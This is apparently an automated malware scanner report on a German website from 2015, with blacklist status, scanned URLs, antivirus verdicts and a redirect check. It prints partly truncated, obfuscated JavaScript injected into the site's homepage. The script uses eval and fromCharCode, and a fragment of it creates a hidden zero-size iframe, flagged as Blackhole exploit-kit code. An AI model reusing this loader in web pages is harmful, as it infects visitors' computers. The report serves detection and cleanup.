Malware Scanner report for schwarzer-donnerstag.de

Malicious/Suspicious/Total urls checked: 1/1/15

2 pages have malicious or suspicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "schwarzer-donnerstag.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=schwarzer-donnerstag.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://schwarzer-donnerstag.de/	200 OK Content-Length: 29202 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) window.eval(String.fromCharCode(115,61,34,34,59,116,114,121,123,113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,34,49,50,51,34,43,110,41,59,125,99,97,116,99,104,40,113,119,41,123,104,61,45,48,49,54,47,55,59,116,114,121,123,97,61,112,114,111,116,111,116,121,112,101,59,125,99,97,116,99,104,40,122,120,99,41,123,101,61,119,105,110,100,111,119,91,34,101,34,43,34,118,97,34,43,34,108,34,93,5 ... 3000 bytes are skipped ...8,46,49,51,50,46,49,50,56,46,50,54,53,46,57,54,46,49,52,52,46,49,54,52,46,50,57,53,34,46,115,112,108,105,116,40,34,46,34,41,59,105,102,40,119,105,110,100,111,119,46,100,111,99,117,109,101,110,116,41,102,111,114,40,105,61,54,45,50,45,49,45,50,45,49,59,45,49,56,50,56,43,105,33,61,50,45,50,59,105,43,43,41,123,107,61,105,59,115,61,115,43,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,110,91,107,93,47,40,105,37,40,104,42,104,41,43,50,41,41,59,125,101,40,115,41,59,125,125)); Decoded script: s="";try{q=document.createElement("p");q.appendChild("123"+n);}catch(qw){h=-016/7;try{a=prototype;}catch(zxc){e=window["e"+"va"+"l"];n="204.351.440.495.232.315.444.550.64.330.404.600.232.246.388.550.200.333.436.390.234.327.392.505.228.120.164.615.26.30.128.160.64.96.472.485.228.96.416.525.64.183.128.580.208.315.460.230.230.303.404.500.64.141.128.580.208.315.460.230.162.177.52.50.64.96.128.160.236.291.456.160.216.333.128.305.64.348.416.525.230.138.460.505.202.300.128.185.64.348.416.525.230.1 ... 19110 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports: AntiVir JS/RunForest.B Avast JS:Redirector-XO [Trj] Ikarus Trojan.Script nProtect JS:Trojan.Crypt.EM K7AntiVirus Trojan Emsisoft JS:Trojan.Crypt.EM (B) Comodo Exploit.JS.Blacole.RB McAfee-GW-Edition JS/Exploit-Blacole.ek DrWeb Exploit.BlackHole.12 Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/BlacoleRef.BS MicroWorld-eScan JS:Trojan.Crypt.EM Fortinet JS/Obfuscus.AACB!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ek NANO-Antivirus Trojan.Script.Expack.bfdeei F-Secure JS:Trojan.Crypt.EM F-Prot JS/IFrame.QW AVG JS/Agent Norman Blacole.HT GData JS:Trojan.Crypt.EM Commtouch JS/IFrame.QW BitDefender JS:Trojan.Crypt.EM
http://www.wecount4u.com/wcount.php?a=Seterias&wu=994716611&layout=1	200 OK Content-Length: 928 Content-Type: text/html	clean
http://www.wecount4u.com/hotcount.php?count=994716611	200 OK Content-Length: 6713 Content-Type: text/html	suspicious
Page code contains blacklisted domain: www.schwarzer-donnerstag.de ...[1158 bytes skipped]... umn --> <div id="main-col"><!-- Nameplate Box --> <div id="nameplate-top"></div><div id="nameplate-middle" class="clearfix"> <img src="images/wecount4u.gif" alt="Counter" /> <p></p> <div align="right">Besucher Gesamt   4341<br> Hits Gesamt  4633<br> Durchschnitt:  5<br> <a target="_BLANK" href="http://www.schwarzer-donnerstag.de">Seterias</a></div> </div><div id="nameplate-bottom"></div> <!-- Main Content --> <div id="content-top"></div><div id="content-wrapper"><div id="content"><div><img src="./testjstunden.php?a=Seterias" alt="Tagesstatistiken" border="0"><br><img src="./testjp.php?a=Seterias" alt="Wochenstatistiken" border="0"><br><img src="./testjahr.php?a=Seterias" alt="Monatsstatistiken ...[3356 bytes skipped]...
http://www.wecount4u.com/wcount.php?a=counterhaus&wu=1&layout=1	200 OK Content-Length: 923 Content-Type: text/html	clean
http://www.wecount4u.com/hotcount.php?count=1	200 OK Content-Length: 1602 Content-Type: text/html	clean
http://www.wecount4u.com/./topliste10.htm	200 OK Content-Length: 10485 Content-Type: text/html	clean
http://www.wecount4u.com/./sign_up.php	200 OK Content-Length: 3885 Content-Type: text/html	clean
http://www.wecount4u.com/./menu.php	200 OK Content-Length: 3676 Content-Type: text/html	clean
http://www.wecount4u.com/./hotcount.php?count=1	200 OK Content-Length: 1602 Content-Type: text/html	clean
http://www.wecount4u.com/././topliste10.htm	200 OK Content-Length: 10485 Content-Type: text/html	clean
http://www.wecount4u.com/././sign_up.php	200 OK Content-Length: 3885 Content-Type: text/html	clean
http://www.wecount4u.com/././menu.php	200 OK Content-Length: 3676 Content-Type: text/html	clean
http://www.wecount4u.com/././hotcount.php?count=1	200 OK Content-Length: 1602 Content-Type: text/html	clean
http://www.wecount4u.com/./././topliste10.htm	200 OK Content-Length: 10485 Content-Type: text/html	clean
http://www.wecount4u.com/./././sign_up.php	200 OK Content-Length: 3885 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: schwarzer-donnerstag.de

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 06:03:45 GMT
Accept-Ranges: bytes
ETag: "4ff1a9e3-7212"
Server: nginx
Content-Length: 29202
Content-Type: text/html
Last-Modified: Mon, 02 Jul 2012 14:02:11 GMT
X-Powered-By: PleskLin

...29202 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: schwarzer-donnerstag.de
Referer: http://www.google.com/search?q=schwarzer-donnerstag.de

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for schwarzer-donnerstag.de

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools